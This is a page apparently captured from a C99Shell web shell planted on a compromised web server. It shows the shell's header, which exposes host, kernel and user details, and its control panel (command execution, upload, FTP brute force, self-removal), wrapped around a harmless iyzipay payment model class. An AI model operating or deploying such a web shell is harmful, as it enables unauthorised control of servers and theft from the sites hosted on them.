!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/iyzico/iyzipay-php/src/Iyzipay/Model/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ApmResource.php (5.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Iyzipay\Model;

use 
Iyzipay\IyzipayResource;

class 
ApmResource extends IyzipayResource
{
    private 
$redirectUrl;
    private 
$price;
    private 
$paidPrice;
    private 
$paymentId;
    private 
$merchantCommissionRate;
    private 
$merchantCommissionRateAmount;
    private 
$iyziCommissionRateAmount;
    private 
$iyziCommissionFee;
    private 
$basketId;
    private 
$currency;
    private 
$paymentItems;
    private 
$phase;
    private 
$accountHolderName;
    private 
$accountNumber;
    private 
$bankName;
    private 
$bankCode;
    private 
$bic;
    private 
$paymentPurpose;
    private 
$iban;
    private 
$countryCode;
    private 
$apm;
    private 
$mobilePhone;
    private 
$paymentStatus;

    public function 
getRedirectUrl()
    {
        return 
$this->redirectUrl;
    }

    public function 
setRedirectUrl($redirectUrl)
    {
        
$this->redirectUrl $redirectUrl;
    }

    public function 
getPrice()
    {
        return 
$this->price;
    }

    public function 
setPrice($price)
    {
        
$this->price $price;
    }

    public function 
getPaidPrice()
    {
        return 
$this->paidPrice;
    }

    public function 
setPaidPrice($paidPrice)
    {
        
$this->paidPrice $paidPrice;
    }

    public function 
getPaymentId()
    {
        return 
$this->paymentId;
    }

    public function 
setPaymentId($paymentId)
    {
        
$this->paymentId $paymentId;
    }

    public function 
getMerchantCommissionRate()
    {
        return 
$this->merchantCommissionRate;
    }

    public function 
setMerchantCommissionRate($merchantCommissionRate)
    {
        
$this->merchantCommissionRate $merchantCommissionRate;
    }

    public function 
getMerchantCommissionRateAmount()
    {
        return 
$this->merchantCommissionRateAmount;
    }

    public function 
setMerchantCommissionRateAmount($merchantCommissionRateAmount)
    {
        
$this->merchantCommissionRateAmount $merchantCommissionRateAmount;
    }

    public function 
getIyziCommissionRateAmount()
    {
        return 
$this->iyziCommissionRateAmount;
    }

    public function 
setIyziCommissionRateAmount($iyziCommissionRateAmount)
    {
        
$this->iyziCommissionRateAmount $iyziCommissionRateAmount;
    }

    public function 
getIyziCommissionFee()
    {
        return 
$this->iyziCommissionFee;
    }

    public function 
setIyziCommissionFee($iyziCommissionFee)
    {
        
$this->iyziCommissionFee $iyziCommissionFee;
    }

    public function 
getBasketId()
    {
        return 
$this->basketId;
    }

    public function 
setBasketId($basketId)
    {
        
$this->basketId $basketId;
    }

    public function 
getCurrency()
    {
        return 
$this->currency;
    }

    public function 
setCurrency($currency)
    {
        
$this->currency $currency;
    }

    public function 
getPaymentItems()
    {
        return 
$this->paymentItems;
    }

    public function 
setPaymentItems($paymentItems)
    {
        
$this->paymentItems $paymentItems;
    }

    public function 
getPhase()
    {
        return 
$this->phase;
    }

    public function 
setPhase($phase)
    {
        
$this->phase $phase;
    }

    public function 
getAccountHolderName()
    {
        return 
$this->accountHolderName;
    }

    public function 
setAccountHolderName($accountHolderName)
    {
        
$this->accountHolderName $accountHolderName;
    }

    public function 
getAccountNumber()
    {
        return 
$this->accountNumber;
    }

    public function 
setAccountNumber($accountNumber)
    {
        
$this->accountNumber $accountNumber;
    }

    public function 
getBankName()
    {
        return 
$this->bankName;
    }

    public function 
setBankName($bankName)
    {
        
$this->bankName $bankName;
    }

    public function 
getBankCode()
    {
        return 
$this->bankCode;
    }

    public function 
setBankCode($bankCode)
    {
        
$this->bankCode $bankCode;
    }

    public function 
getBic()
    {
        return 
$this->bic;
    }

    public function 
setBic($bic)
    {
        
$this->bic $bic;
    }

    public function 
getPaymentPurpose()
    {
        return 
$this->paymentPurpose;
    }

    public function 
setPaymentPurpose($paymentPurpose)
    {
        
$this->paymentPurpose $paymentPurpose;
    }

    public function 
getIban()
    {
        return 
$this->iban;
    }

    public function 
setIban($iban)
    {
        
$this->iban $iban;
    }

    public function 
getCountryCode()
    {
        return 
$this->countryCode;
    }

    public function 
setCountryCode($countryCode)
    {
        
$this->countryCode $countryCode;
    }

    public function 
getApm()
    {
        return 
$this->apm;
    }

    public function 
setApm($apm)
    {
        
$this->apm $apm;
    }

    public function 
getMobilePhone()
    {
        return 
$this->mobilePhone;
    }

    public function 
setMobilePhone($mobilePhone)
    {
        
$this->mobilePhone $mobilePhone;
    }

    public function 
getPaymentStatus()
    {
        return 
$this->paymentStatus;
    }

    public function 
setPaymentStatus($paymentStatus)
    {
        
$this->paymentStatus $paymentStatus;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--